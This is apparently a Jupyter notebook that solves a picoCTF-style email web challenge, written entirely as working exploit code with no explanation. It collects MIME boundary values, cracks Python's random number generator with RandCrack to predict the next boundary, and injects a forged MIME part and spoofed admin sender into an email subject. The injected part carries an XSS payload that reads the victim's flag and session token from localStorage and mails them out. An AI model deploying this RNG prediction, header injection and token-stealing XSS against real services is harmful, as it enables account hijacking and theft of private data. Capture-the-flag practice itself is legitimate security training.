In [ ]:
import requests
from randcrack import RandCrack
import random
import sys
import json
from tqdm import tqdm
import base64

In [ ]:
# server_url = 'http://activist-birds.picoctf.net:51901'
server_url = 'http://0.0.0.0:8000'
password = password if "password" in locals() else eval(requests.get(server_url + '/api/password').text)
token = eval(requests.post(server_url + '/api/login', json={'username': 'user@ses', 'password': password}).text)

In [ ]:
def send(to, subject, body):
    res = requests.post(server_url + '/api/send', json={'to': to, 'subject': subject, 'body': body}, headers={'token': token})
    return json.loads(res.text)

def email(id):
    res = requests.get(server_url + f'/api/email/{id}', headers={'token': token})
    return json.loads(res.text)


In [ ]:
def split_long(rng):
    m = []
    for i in rng:
        m.append(i % 2**32)
        m.append((i >> 32) * 2)
    return m

def crack(m):
    for i in tqdm(range(0, 396, 2)):
        if i < 624-397: # corrects odd values from 1-227 and 397-623
            for b in range(4):
                m[i+1] = (m[i+1] // 2) * 2 + b % 2
                m[i+397] = (m[i+397] // 2) * 2 + b // 2

                rc = RandCrack()
                for x in m[:624]: rc.submit(x)
                rc.offset(i)
                if (rc.predict_getrandbits(32) == m[i+624]): break
            else: raise Exception()
        else: # corrects odd values from 229 to 395
            # we only have to check 2 values now because
            # i+397 wraps around to a number we have solved for already
            for b in range(2):
                m[i+1] = (m[i+1] // 2) * 2 + b % 2

                rc = RandCrack()
                for x in m[:624]: rc.submit(x)
                rc.offset(i)
                if rc.predict_getrandbits(32) == m[i+624]: break
            else: raise Exception

    rc = RandCrack()
    for x in m[:624]: rc.submit(x)
    rc.offset(510 * 2 - 624)

    return rc

def crackalack():
    print('Collecting emails...')
    rng = []
    for i in tqdm(range(510)):
        id = send('user@ses', '', '')
        data = email(id)
        boundary = int(data['data'].split('=')[16])
        rng.append(boundary)
    
    print('Cracking...')
    rc = crack(split_long(rng))

    def generator():
        while True:
            yield rc.predict_randrange(sys.maxsize)

    return generator()

In [ ]:
next(boundary_gen)
boundary = f'--==============={next(boundary_gen)}=='

xss = '''<img src=x onerror="fetch('/api/send', {method: 'POST',body: JSON.stringify({ to: 'user@ses', body: localStorage.getItem('flag'), subject: localStorage.getItem('flag') }),headers: {'Content-Type':'application/json','token': localStorage.getItem('token')}})">'''.encode()

subject = f'''{boundary}
 Content-Type: text/html
d{boundary}
 Content-Transfer-Encoding: base64

{base64.b64encode(xss).decode()}{boundary}
'''.encode()

payload = f"""=?UTF-8?B?{base64.b64encode(subject).decode()}?=
orz
 From: admin@ses
"""

send('admin@ses', payload, 'PLSPLSPLSPLSPLS')

In [ ]:
requests.post(server_url + '/api/admin_bot', headers={'token': token})

In [ ]:
requests.post(server_url + '/api/admin_bot', headers={'token': token})